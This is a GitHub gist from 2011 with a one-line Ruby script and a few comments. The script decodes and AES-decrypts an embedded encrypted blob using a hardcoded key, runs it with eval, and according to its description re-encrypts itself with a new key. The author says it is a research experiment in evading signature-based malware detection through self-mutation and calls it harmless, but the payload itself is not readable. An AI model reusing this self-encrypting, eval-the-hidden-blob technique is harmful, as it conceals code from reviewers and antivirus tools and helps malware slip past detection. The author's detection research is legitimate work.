Created
November 23, 2011 22:49
-
-
Save codeincontext/1390169 to your computer and use it in GitHub Desktop.
This Ruby script will decrypt itself, execute a payload, and re-encrypt itself with a new key
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'OpenSSL';require 'Base64';c = 'A9owhIxrZX3kHFGKqn0dOoybYZWBQxGygOviG1ane9/aDwezVW/AzDDoD6ZZTdLkjd3RAxbkHD9rHSa+Z7js6QzylYBnMsPjZYVzEE//g4/2anuBI9aWwKjqj45T1UkO4cxKtziUzwPB5rXt5Rx1AnwzUeI0brlqcqNctzLp4aVZbfbW4p0gHUTAej3wk4uD3+ioqMe4hDGUQWiUp9p7IDHancMhhQg60O9990TFev54YUBokJxj09Wo8SsMbw7M/Xy/xJ3gbc9tx9fBGGASJcTkCdHqYYU4kOieogC9AtHM54xsfhKu5s5okyFPHaN9ylboEmB0IlZnwf7GhG6IOuOAC9o7jI31mrRbjTiyYglcNPf5yrVepPpZOlJ+sjNKIf6meDdrmIdv2iyMAvIVfoVEOmnzyFAE6r7sCQ3nyAHHtdDKErSWkhWsPgLg5Gl5b3pEazHVrafB2aeqYKeTzNGejxjVXMId2K2v1I0MqUgTLlJ2gyAWHtUcV63yX6DplqCph4vylwap0JH+dp8kltUimeC/qKYSFZL45lhFlNoMDF4O89ekizZmljCMtVgll1Amzt5/xDAcHMXoEz7iZ3xTArDbt0FbX6HjABPvcCJTAhl8kDV0BqILXfJycJ8rKvlXJ5pqoryYZJoNqTOvaiRiRHokX5xM07ej8japZeYZq2F20ejJL1oB13Q11LuGS2YnjlcDtxbdDcHJikUj28GmI19/lZenj1IiktoO1zPlPyFXO8GZXTM5y8RbVM/WyUBNPh3Peae7PcAfD6SPZLJAbOd6Xe46H4yNv2kuxV3HJVQc37+Sp5ALWxEIdDA+GLNbLvTdLo9T1mUJbO/vHn0iHHIrwccfaY6IyFVQQW/9TSVUka7ulL7QuSu8gsD1/5BYhZJAX4Un6ZOl35UR4onoTGnP1DTrOa7yp9RLAfvrd0iaSXNF3aZkLO8n7X6LmqUr2krCtEb2uVANeUfr3+wUek5RTfWPc4TDgx1bEYrDnMwUfN/VQnrl+L6KEWX9glam3imvopkGIMklR8fyJDeiVhkd2LCOwvwSqjpcEybgm79f0r2CSkNxr1bZnuvuzP7heFaASCXm2co3z2I2BYit6BOJurozmFup/W9AAngaQ/iRoFCXQMlekfZOZS/3UeMxuG/GGYhnIdQw3eHzMwafQL6VpbIDsvf1BwqwSO2EOFxr56Gcxi9lUAVUVepuiLKw0ZPGmyU+AwIvVjIHtU0R2qxeVKysDccbZa1ENQPLPuBmkxwAY+3pUULRdkIEkuWibvF9rDl65WRRJlLZfmeVsegm28DgW+u2DLDLGTbxcjE3J4mRzn3x4xkjnEsGyiW6nj32ikBfktkkqeMEa4m4HLOsupJSrftIkKWVxDGq0JzhQct8wcjtEv7tSyhhHRpivVfQjpodg3BUIz/KKjzlfSoyoVpGyiImCspueGyv6CBCdKzQPbodJZSWiVDmFJYOhK3+9LigX96Eg/5k0Jtac2MuTlX23bDN6n2xXjPyvboRwSUqUFTBlZDZ/EEIE5l5ogjBfo+JeauSgyfzmHvYnxWYtuEBeKk1af3+3SkqSihXQ9Bgm29tm6sk+MC5tOfzb6JvB8ddS5jIERdgE3N5lvqcM2tl+m6gkXFu2xW3SRP6vh9Ywez1PpFUpNL7/EEIxpSmGUJdBNck7RsjF47PRrAEC/KzeBrwCoC2qYMIetmZgqbibJ7D9ZzHfwRhK+nzqM3umCICQqs0hCXtSfWgUYJ03HWUQNq4Nog8KQKKTOGeTnBRdTp7pDf8JHrOAlPn03PEcUiVl6bX1LZ3qLNCBqyS81Qbeti6zptYSUihik31D1zbiyIMjHxJmFS8+oNHOoFuYtUVHt3YRPeBV9t2Qbo/tYcayWuWJtQQvjJe0CwjFZ/FUeqb36b8ivPGrtaaPzYk19XfmbOz3IsPwnjOkh/7GuB9K0rdQA5xOMARF90n7nrFJUkxY6R66OjRofvHEv7SuK9KaYmvx30iXxUTEYB0CoRWfU9ljRzy3FmKiCCITBrAFMwP6Voc6dlbqhZPkYREFK2oQ+uTr3JX8I1Ald8efsHehvtXYt9h4r0rOcUdTVlme4p8FbHVdHgZJRvutIDvzZuHl5gfaUzpvzsVTghfC5HcOO6LXXBTEoIjTs/pdooLTGNd9bOSNZodUr6DNy76oSWBh1Qpsj1P5r5p4iEpvlnSsOkXiSu3bJ6uys8eq39XPz0F6y+fjcl4ekcxuVlmpmP17NSpmwH/zLM9NtW2z+qdde+VwajGeyT7uv/TjsnOHMPuK6ZMsSDU2NKDsArwUdFQsDUkgh2Wfx4wWTZvaeKhAa7Gk9hwVaMYch0exKqKdu3qZnLwKS0KRd3/C4QWTziyO9cI1hHRCx/atqf9Dp6RR5X54PGSgFFY71Cd1czm2zmq+tq3JLnQShNfEpJQ+nYSR2dFsHOG+mYL0SI3iAUZ+2X9s4+cOelpSX4bv87Lg0yLmxn9yqzoPXh99G7MKWvecVcKSLO2cQ/eLBH46LWN7KyAEsYegjI=';c = Base64::decode64 c;s = OpenSSL::Cipher::Cipher.new('aes-256-cbc');s.decrypt;s.pkcs5_keyivgen('a1d53d0b3c1006b2ae67080130f12037');d = s.update(c) + s.final;eval d |
Apparently a syntax error?
Works fine in Ruby 1.9.2 in IRB and from a file. Sure you copied it right?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I made this while researching signature-based malware detection. The idea is that this code could potentially evade basic signature-based detection by mutating itself. It doesn't actually do anything harmful, just re-encrypts itself.
The encoded string it generates is a lot larger than it needs to be, because it contains the original, unminified source. If I minified and uglified the source it could be as little as 25% of the size.